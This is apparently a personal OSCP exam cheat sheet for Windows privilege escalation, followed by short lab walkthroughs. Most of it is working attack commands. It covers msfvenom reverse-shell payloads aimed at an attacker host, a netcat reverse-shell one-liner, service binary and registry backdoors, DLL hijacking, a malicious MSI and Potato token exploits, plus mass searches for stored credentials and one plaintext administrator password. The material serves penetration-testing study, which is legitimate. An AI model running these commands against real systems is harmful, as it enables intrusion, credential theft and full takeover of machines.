Windows Privilege Escalation

In the OSCP exam, Only Gaining access is not enough. Most of the machines may require to escalate to higher privilege. To learn more about Windows privilege escalation, I have taken a course from Udemy watched the ippsec youtube video, and read tutorials from various sources. Whatever I have learned, I took note.

I have organized my notes as a cheat sheet, which is now public.

Note: A cheat sheet is not understandable without basic knowledge! After all cheat sheet is not a tutorial!

Note: If you find this cheat sheet helpful, please share it! And if you want to connect with me, follow my Facebook page and and would like to put a review:

Follow me on twitter:


I would like to follow two standards and cheatsheet online:

  1. Hacktricks escalation checklist
  2. PayloadAllTheThings Escalation CheatSheet

Helpful Tools

  1. WinPeas: This tool checks common misconfigurations that may lead to escalating privilege.
  2. PowerUP: It is a Powershell script to check common vulnerabilities.
  3. Windows-Exploit-Suggester: It is a Windows Kernel Exploit suggester.
  4. icacls(Windows): Display Access Control List on Specified files.


All tools first need to be transferred to the target machine!


.\winpeas.exe serviceinfo


powershell.exe -exec bypass
. .\

Windows Exploit Suggester:

From the target first, collect the output of systeminfo command and save in Kali.

python -u
python -i systeminfo.txt -u *.xls


icacls "path_to_check"


We need to enumerate basic information before attempting to escalate privilege.

#Get Windows Version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
#Get patch Information
wmic qfe get Caption, Description, HotFixID, InstalledOn

#Get current username

#Get groups and permission information
whoami username /all 

#get user list
net user 

#get information for specific user
net user admin

#Get OS information like version, hotfix etc.

#List all running process. Keep Note the suspicious one!
netstat -ano 

#List all profile's firewall rules!
netsh advfirewall firewall show rule name=all 

#List all installed software.
wmic product get name 

#List all installed software and version.
wmic product get name, version 

#Get scheuduled task list
schtasks /query /ms LIST /v

#Running Process
tasklist /SVC

#Vulnerable Drivers
driverquery.exe /fo table

Kernel Exploits

Kernel Exploit could be dangerous. So any kernel exploit should be run if there is no other way to escalate the privilege.

Get System Information and transfer it to a remote Linux host. This is the command we need to run before we find exploits on Google or Searchsploit:

$ systeminfo

Use Windows Exploit Suggester to get exploit suggestions:

python -u
python -i systeminfo.txt -u *.xls

We can use the information generated by Windows-exploit-suggester to find a compiled exploit in the following link:

Find Exploit in Google and Searchsploit. Example:

Google> Windows Version Privilege Escalation Exploit
Searchsploit> $ searchsploit windows 10

Service Exploits

If a service is improperly configured, it may lead to escalate to higher privilege. 5-way service can be exploited.

  1. Insecure Service Permission
  2. Unquoted Service Path
  3. Insecure Registry Permission
  4. Insecure Service Executable
  5. DLL Hijacking

Service Enumeration

We should find out all running services and their version.

tasklist /SVC


wmic service list brief

Listing All Running Services

sc queryex type=service 
powershell.exe -c "Get-Service | Where-Object {$_.Status -eq "Running"}

Search for more info against a suspicious service with this cmd/PowerShell command

sc queryex type=service state=all | find /i "SERVICE_NAME: service_name"
powershell.exe -c "Get-Service | Where-Object {$_.Name -like "*service_name*"}

Find the status of the target services! We can check with these commands.

sc query service_name 
Get-Service service_name

Modifying a service binary path

sc config service_name binpath='c:\windows\temp\shell.exe'

Start and Stop a Service

net start serv_name
net stop serv_name

Exploit Insecure Services Permission

We need to find a suspicious service name. If a service running with permission SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS, We can exploit it by changing its binary path.

sc qc service_name
sc config service_name binpath="c:\windows\temp\backdoor.exe"
net stop service_name
net start service_name

Exploiting Unquoted Service Path

If a service is not enclosed within the quote, it may help us to escalate the privilege. Anyone folder of the service path needs to be writable. For example, I found C:\Program Files\Deploy Ready\Service Files\Deploy.exe. In C:\Program Files\ Directory, The “Deploy Ready” and “Service Files” subdirectories are writable. We can exploit this vulnerability to escalate the privilege. How does it work?

  1. When starting the service, if it failed to execute Deploy.exe
  2. It will execute C:\Program Files\Deploy Ready\Service.exe
  3. If Service.exe was not found, C:\Program Files\Deploy.exe will be executed!

Find Vulnerability

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

#With winpeas
.\winPEAS.exe quiet servicesinfo

Test If any directory is writable:

  1. Manually
echo "Test";"C:\Path a\Path b\Path c\test.txt" #no permission denied? We are fine then
icacls "C:\Path a\Path b\Path c\test.txt" #F=Full, W=Write
  1. With Accesschk(More efficient)
.\accesschk.exe /accepteula -uwdq C:\
.\accesschk.exe /accepteula -uwdq "C:\Program Files\"
.\accesschk.exe /accepteula -uwdq "C:\Program Files\Service Path"


If we don’t have permission to restart the service we can try to reboot the machine. And if the service is configured AUTO_START and runs as LocalSystem, we will get a system shell

sc qc "service_name"
copy \\smb_ip\\Service.exe "C:\Program Files\Deploy Ready\Service.exe"
net start service_name
#If unable to start the service try rebooting
shutdown /r /t 0

Insecure Registry Permission

If we can’t write to a service directory/folder but can modify or write to a registry, we can escalate the privilege.

Find Services

#Get All Services info
.\winPEAS.exe quiet servicesinfo

#Get All Services info
.\winPEAS.exe quiet servicesinfo
reg query hklm\System\CurrentControlSet\Services /s /v imagepath

Confirm Registry weak permission

#Confirm Weak Permission with Powershell command
Get-Acl HKLM:\System\CurrentControlSet\Services\SrvName |Format-List

#Confirm with accesschk
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\SrvName


If we confirm that we can modify the registry:

#Add Backdoor to the Registry
reg add HKLM\SYSTEM\CurrentControlSet\srevices\SrvName /v ImagePath /t REG_EXPAND_SZ /d C:\windows\temp\backdoor.exe /f
#Start the service
net start SrvName

DLL Hijacking

If a program or service can’t load a dll file in the specified directory, we can supply our own malicious dll for escalation. The DLL loading folder needs to be writable!

Check Permission of the Program folder

icacls C:\program\

Create a Malicious Dll File and move the payload to program specified directory.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attack_IP LPORT=attacker_port -f dll -o exsisting.dll

Now Try to restart the service or execute the vulnerable program

Exploit Startup Program

We need to copy the accesschk64.exe to the remote host to check permission. If a program has FILE_ALL_ACCESS permission, we can exploit it for the system shell.

accesschk64.exe -wvu “C:\Program Files\Autorun Program”
copy \\smb_ip\backdoor.exe “C:\Program Files\Autorun Program\program.exe”

We can also get admin sessions by exploiting startup applications. Check the permission. If the folder has written permission, we just need to copy our shell.exe to that folder and wait for an admin to login.

icacls.exe “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”
copy \\smb_ip\bak.exe “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\bak.exe”

Exploiting AlwaysInstallElevated

We need to check if it is enabled. If the value is 0x1, we can exploit it!

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer

Generate a backdoor with Metasploit, and Transfer to the victim machine

msfvenom -p windows\x64\meterpreter\reverse_tcp LHOST=tester_ip LPORT=tester_port -f msi -o smb-folder\shell.msi

Copy shell.msi to the victim machine using SMB or another way and run:

msiexec /quiet /qn /i shell.msi

Exploiting Clear Text password

If we are lucky we may find the password in clear text.

Note: This section heavily copied from

Finding WIFI password

netsh wlan show profile
netsh wlan show profile <SSID> key=clear

Search Sensitive Files that may have a credential

cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies == "Login Data" == places.sqlite == key3.db == key4.db == credentials == credentials.db == access_tokens.db == accessTokens.json == legacy_credentials == azureProfile.json == unattend.txt == access.log == error.log == *.gpg == *.pgp == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12 == *.der == *.csr == *.cer == known_hosts == id_rsa == id_dsa == *.ovpn == anaconda-ks.cfg == hostapd.conf == rsyncd.conf == cesi.conf == supervisord.conf == tomcat-users.xml == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == unattend.xml == unattended.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == groups.xml == services.xml == scheduledtasks.xml == printers.xml == drives.xml == datasources.xml == php.ini == https.conf == https-xampp.conf == httpd.conf == my.ini == my.cnf == access.log == error.log == server.xml == SiteList.xml == ConsoleHost_history.txt == setupinfo == setupinfo.bak 2&gt;nul | findstr /v ".dll"

Search for “Password”

#Search suspicious files from filename
dir /s /W *pass* == *cred* == *vnc* == *.config* | findstr /i/v "\\windows"

#Search suspicious files from content
findstr /D:C:\ /si password *.xml *.ini *.txt #A lot of output can be generated
findstr /D:C:\ /M /SI password *.xml *.ini *.txt 2&gt;nul | findstr /V /I "\\AppData\\Local \\WinXsX ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.CloudExperienceHost" 2>null

Search Password in Registry

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2&gt;nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" #Autologin
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s #Check the values saved in each session, user/password could be there
reg query "HKCU\Software\OpenSSH\Agent\Key"

# Search for passwords inside all the registry
reg query HKLM /f password /t REG_SZ /s #Look for registries that contains "password"
reg query HKCU /f password /t REG_SZ /s #Look for registries that contains "password"

Try With Winpeas:

.\winPEAS.exe quiet filesinfo userinfo


Using cmdkey

cmdkey /list
runas /savecred /user:Administrator "c:\windows\temp\backdoor.exe"

By providing credentials

C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"

Exploiting Well-known Software

Some software installed in the target machine may have a public exploit to use. We should google search for an exploit with the version of installed software.

tasklist /v 
.\winpeas.exe quiet processinfo

Schedule Task

#from CMD
schtasks /query /fo LIST /v
#In Powershell
PS> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

For the example above command is found C:\Tools\Adm.Ps1 is running every 10 minutes as a system and we have right to modify it:

accesschk.exe /accepteula -quvw user C:\Tools\Adm.Ps1

We simply can append our command to execute as a system. Let’s append a command to run rev.exe(Reverse shell to port 443):

echo C:\windows\temp\rev.exe>> C:\Tools\Adm.Ps1

If everything goes well, we should have a shell as a system in 10 minutes!

Dangerous User Privileges

Some privileges for a user is dangerous. They could lead to escalate to higher privilege I will list some of them:


It can act as any other user, such as Administrator. The vulnerability could be exploited with JuicyPotato


Assign an access token to the new process. Can be exploited with JuicyPotato


If a user has this privilege he is able to read files. That means the user can extract password/hash from the registry which could be used for a pass-the-hash attack


This privilege grants a user to modify service binary, dll, also modify registry settings

Others risky Privilege

  1. SeCreateTokenPrivilege
  2. SeLoadDriverPrivilege
  3. SeDebugPrivilege

Hot Potato Exploit

A Tutorial:

Windows 7

.\Potato.exe -ip &lt;local ip> -cmd &lt;command to run> -enable_defender true -enable_spoof true -disable_exhaust true

Windows 10

.\Potato.exe -ip &lt;local ip> -cmd &lt;cmd to run> -disable_exhaust true -disable_defender true

Juicy Potato

If SeImpersonate/SeAssignPrimaryToken JuicyPotato can be used to escalate privilege.

Note: CLSID can be found in:

JuicyPotato.exe -l 4444 -p C:\Windows\Temp\Rev.exe -t * -c {CLS_ID}

Rogue Potato

Just another Windows Local Privilege Escalation from Service Account to System. So the requirement is the accessed account needed to be a service account.

.\RoguePotato.exe -r –l 9999 -e "C:\Windows\Temp\rev.exe

Quick Real Example

In the same way we can add a root user to the /etc/passwd!

Unquoted Service

OS Name: Microsoft Windows Server 2012 R2 Datacenter
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
&gt;whoami /all
whoami /all
User Name SID
================= =============================================
deployable\tomcat S-1-5-21-2340103987-1023754366-731290932-1001
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

> wmic product get name, version
> powershell -c Invoke-WebRequest "" -OutFile "wino.exe"

> .\wino.exe serviceinfo
Deploy(Deploy)[C:\Program Files\Deploy Ready\Service Files\Deploy.exe] - Manual - Stopped - No quotes and Space detected
> cd "C:\Program Files\Deploy Ready\"

Generating the Exploit in Kali, Starting Python Server and Listening for connection:

$ msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=1337 -f exe &gt; Deploy.exe
$ python3 -m http.server
$ nc -lvp 1338

Downloading and running exploit in Windows:

sc qc deploy
>powershell -c Invoke-WebRequest "" -OutFile "C:\Program Files\Deploy Ready\Service.exe"
>sc start deploy

Clear Text Password

I was just able to get a shell with exploiting blogengin. Uploaded Winpeas and it was able to find AutoLogon Credential

Here is the step I did in Kali to get Administrator access:

winexe -U Administrator%PzCEKhvj6gQMk7kA // cmd.exe

Escalated with JuicyPotato

If the user has SeImpersonate or SeAssignPrimaryToken privileges then you are SYSTEM.

Note: Juicy Potato doesn’t work on Windows Server 2019 and Windows 10 1809 +.

Generated another Shell:

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=1338 -f exe>shell1338.exe

Uploaded JuicyPotato.exe and the shell1338.exe:

powershell -c Invoke-WebRequest "" -OutFile "shell1338.exe"
powershell -c Invoke-WebRequest "" -OutFile "JuicyPotato.exe"

Execute for system shell(CLS ID can be found in: and , Note tested):

JuicyPotato.exe -t * -l 1010 -p shell1338.exe
JuicyPotato.exe -t * -l 1010 -p shell1338.exe -c {cls_id}

Modify Binary to Escalate

I was logged in to evil-winrm. Windpeas did not find anything. So i tried manual enumeration. Here is the step of escalation:

Evil-WinRM PS C:> services
Path Privileges Service
---- ---------- -------
"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" False AmazonSSMAgent
"C:\Program Files\Amazon\XenTools\LiteAgent.exe" False AWSLiteAgent
"C:\Program Files\Amazon\cfn-bootstrap\winhup.exe" False cfn-hup
C:\Services\monitor1.exe True monitor1
C:\Services\monitor2.exe True monitor2
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe False PerfHost
C:\Windows\servicing\TrustedInstaller.exe False TrustedInstaller

Evil-WinRM PS C:> icacls Services\monitor1.exe
Services\monitor1.exe BUILTIN\Users:(I)(F)
Successfully processed 1 files; Failed processing 0 files

Evil-WinRM PS C:\services> upload /home/bytef/cybsec/monitor1.exe
Info: Uploading /home/bytef/cybsec/monitor1.exe to C:\services\monitor1.exe
Data: 98400 bytes of 98400 bytes copied
Info: Upload successful!
Evil-WinRM PS C:\services> cmd /c "sc start monitor1"
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
Evil-WinRM PS C:\services>

And quickly I got a system shell